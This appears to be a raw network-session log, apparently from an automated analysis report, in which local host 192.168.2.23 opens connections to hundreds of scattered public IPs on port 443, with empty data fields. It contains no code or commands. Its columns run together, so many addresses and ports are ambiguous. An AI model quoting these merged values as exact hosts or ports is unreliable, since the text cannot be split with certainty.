                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25664192.168.2.2343528108.53.237.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25665192.168.2.2339066130.219.39.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25666192.168.2.2346688158.103.20.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25667192.168.2.234268461.62.19.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25668192.168.2.2337434194.238.100.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25669192.168.2.2355962104.9.156.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25670192.168.2.2357622108.72.246.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25671192.168.2.235184869.5.81.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25672192.168.2.234627045.106.193.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25673192.168.2.234533837.22.117.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25674192.168.2.235382673.93.8.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25675192.168.2.2344868219.212.97.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25676192.168.2.2348530194.177.226.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25677192.168.2.2344302178.164.15.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25678192.168.2.235506866.165.36.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25679192.168.2.235238069.197.54.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25680192.168.2.2348316205.85.206.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25681192.168.2.234036046.154.143.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25682192.168.2.2358848219.234.93.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25683192.168.2.233414842.113.65.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25684192.168.2.233630094.23.6.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25685192.168.2.235326020.231.192.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25686192.168.2.2347100129.88.176.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25687192.168.2.2334594135.131.70.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25688192.168.2.2360632101.150.30.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25689192.168.2.233993437.71.180.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25690192.168.2.2352568184.3.19.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25691192.168.2.2345804176.117.29.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25692192.168.2.2349066161.165.39.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25693192.168.2.2332884155.89.140.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25694192.168.2.2335596114.195.12.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25695192.168.2.23533908.12.130.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25696192.168.2.2335266216.167.162.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25697192.168.2.2344780123.127.253.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25698192.168.2.2357076112.213.128.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25699192.168.2.2340018190.66.218.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25700192.168.2.235612670.197.117.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25701192.168.2.235433235.232.234.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25702192.168.2.2342278208.46.105.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25703192.168.2.2354416142.6.127.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25704192.168.2.235626217.191.83.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25705192.168.2.23328524.187.112.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25706192.168.2.2353140196.115.190.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25707192.168.2.2344524116.201.138.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25708192.168.2.2338134115.192.142.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25709192.168.2.234656692.24.204.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25710192.168.2.2350784130.106.68.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25711192.168.2.2340166158.127.211.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25712192.168.2.2338434128.79.101.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25713192.168.2.234486680.107.153.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25714192.168.2.233382259.49.116.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25715192.168.2.2347066129.17.53.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25716192.168.2.2340400190.156.59.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25717192.168.2.2344718153.7.176.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25718192.168.2.2343992110.95.238.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25719192.168.2.2349452164.26.241.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25720192.168.2.2335612102.75.189.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25721192.168.2.23387428.52.39.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25722192.168.2.235967037.93.163.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25723192.168.2.233899464.251.57.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25724192.168.2.234172643.241.184.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25725192.168.2.2360958148.98.227.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25726192.168.2.235650419.93.133.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25727192.168.2.233482425.83.28.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25728192.168.2.2339880212.236.126.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25729192.168.2.23556581.247.204.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25730192.168.2.2337720219.42.58.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25731192.168.2.2355416210.64.138.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25732192.168.2.233982432.126.142.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25733192.168.2.2360884162.216.51.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25734192.168.2.235827479.57.226.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25735192.168.2.235760461.85.188.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25736192.168.2.2339780107.187.30.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25737192.168.2.233968489.195.124.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25738192.168.2.2343412157.193.99.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25739192.168.2.2335620199.212.181.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25740192.168.2.2360720119.114.14.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25741192.168.2.2334722198.120.92.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25742192.168.2.2358866137.62.66.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25743192.168.2.2337854198.25.7.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25744192.168.2.2333992155.131.35.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25745192.168.2.2346890120.225.53.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25746192.168.2.2359806190.135.52.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25747192.168.2.2359564104.236.34.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25748192.168.2.2336624171.187.252.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25749192.168.2.2336028209.59.135.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25750192.168.2.2347530193.94.202.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25751192.168.2.2355008185.36.98.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25752192.168.2.235835032.232.25.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25753192.168.2.233749881.229.130.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25754192.168.2.233405817.204.40.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25755192.168.2.23474485.84.67.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25756192.168.2.2335512161.39.93.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25757192.168.2.235173284.171.233.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25758192.168.2.2335262118.240.171.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25759192.168.2.235419241.182.20.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25760192.168.2.2335954147.239.41.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25761192.168.2.2354740197.210.227.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25762192.168.2.2352824132.203.95.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25763192.168.2.2341752152.106.182.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25764192.168.2.2338788133.132.153.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25765192.168.2.2335380202.53.176.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25766192.168.2.2336546138.207.231.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25767192.168.2.2334454208.150.238.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25768192.168.2.233374225.130.25.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25769192.168.2.2350244223.144.19.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25770192.168.2.234857680.171.230.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25771192.168.2.233595684.140.6.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25772192.168.2.2352314132.50.230.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25773192.168.2.233986213.152.77.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25774192.168.2.234300619.2.207.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25775192.168.2.2333636102.195.52.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25776192.168.2.2354372171.53.207.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25777192.168.2.2354522155.103.247.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25778192.168.2.2342732119.88.215.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25779192.168.2.2359632157.229.243.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25780192.168.2.2359468198.66.237.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25781192.168.2.2343076218.3.115.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25782192.168.2.2357610217.70.142.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25783192.168.2.2334952122.99.210.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25784192.168.2.2343872219.161.21.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25785192.168.2.2343524202.196.60.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25786192.168.2.233545092.176.186.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25787192.168.2.2352308108.10.177.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25788192.168.2.2345668143.241.95.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25789192.168.2.2353232109.219.253.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25790192.168.2.23559084.68.200.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25791192.168.2.2337668138.115.187.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25792192.168.2.235781039.254.133.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25793192.168.2.235999288.139.196.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25794192.168.2.2344684133.238.46.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25795192.168.2.2337488223.44.238.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25796192.168.2.234160491.66.0.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25797192.168.2.2353012156.208.73.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25798192.168.2.2359708164.170.63.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25799192.168.2.235356049.124.31.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25800192.168.2.2350026163.68.178.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25801192.168.2.2350292104.74.95.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25802192.168.2.235220219.98.43.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25803192.168.2.2332846178.163.20.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25804192.168.2.2336610135.231.8.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25805192.168.2.233439482.180.185.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25806192.168.2.2352088141.133.5.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25807192.168.2.2354974108.10.86.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25808192.168.2.235211475.250.243.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25809192.168.2.2340018136.223.211.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25810192.168.2.2340634112.161.202.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25811192.168.2.2352168102.164.121.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25812192.168.2.2349256109.215.120.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25813192.168.2.233629837.74.26.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25814192.168.2.233318085.189.70.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25815192.168.2.234633061.132.233.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25816192.168.2.2360014109.46.78.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25817192.168.2.2349006117.82.146.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25818192.168.2.234499036.174.74.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25819192.168.2.2351996207.116.42.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25820192.168.2.2345086154.20.110.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25821192.168.2.234595653.41.23.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25822192.168.2.234206018.89.174.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25823192.168.2.2350934223.252.74.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25824192.168.2.2341212147.47.27.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25825192.168.2.2333966186.230.39.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25826192.168.2.2353614185.160.94.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25827192.168.2.235702427.166.129.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25828192.168.2.234475271.126.22.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25829192.168.2.235972087.71.206.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25830192.168.2.2341722106.185.150.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25831192.168.2.234873078.166.74.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25832192.168.2.2347662143.177.124.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25833192.168.2.2349548219.31.23.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25834192.168.2.2337820181.78.46.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25835192.168.2.2339302139.128.212.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25836192.168.2.2353070201.159.141.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25837192.168.2.2336426154.109.98.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25838192.168.2.2359502133.151.115.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25839192.168.2.2336334106.88.84.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25840192.168.2.234434269.13.169.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25841192.168.2.233393670.192.69.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25842192.168.2.2340668135.85.245.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25843192.168.2.235602490.22.5.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25844192.168.2.2347420136.168.31.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25845192.168.2.2347364184.189.29.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25846192.168.2.235290877.246.38.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25847192.168.2.2356528183.221.196.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25848192.168.2.234875279.64.148.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25849192.168.2.235228085.11.21.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25850192.168.2.234783012.232.203.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25851192.168.2.2344804202.24.81.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25852192.168.2.233922640.179.196.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25853192.168.2.234326643.41.11.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25854192.168.2.2340434169.90.84.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25855192.168.2.2354934180.87.148.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25856192.168.2.2350076151.236.141.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25857192.168.2.2358416193.115.174.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25858192.168.2.2349190126.145.31.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25859192.168.2.234034475.193.88.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25860192.168.2.234577418.22.121.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25861192.168.2.2338848118.241.151.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25862192.168.2.2342408183.27.146.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25863192.168.2.235362694.210.87.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25864192.168.2.235743478.68.90.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25865192.168.2.233487652.34.40.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25866192.168.2.2356054163.175.38.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25867192.168.2.2348388129.64.224.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25868192.168.2.2355970158.167.251.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25869192.168.2.234508257.35.80.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25870192.168.2.234919240.76.82.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25871192.168.2.235072291.59.24.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25872192.168.2.233415223.61.71.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25873192.168.2.234897299.85.177.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25874192.168.2.2335124168.98.20.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25875192.168.2.234469640.70.187.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25876192.168.2.2334054212.64.5.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25877192.168.2.235677072.75.90.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25878192.168.2.2358838172.201.158.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25879192.168.2.2348646168.167.40.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25880192.168.2.2333742196.245.139.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25881192.168.2.2332870171.48.13.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25882192.168.2.2360986165.146.206.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25883192.168.2.2358568142.204.0.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25884192.168.2.2358796157.115.132.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25885192.168.2.2356396203.128.187.117443
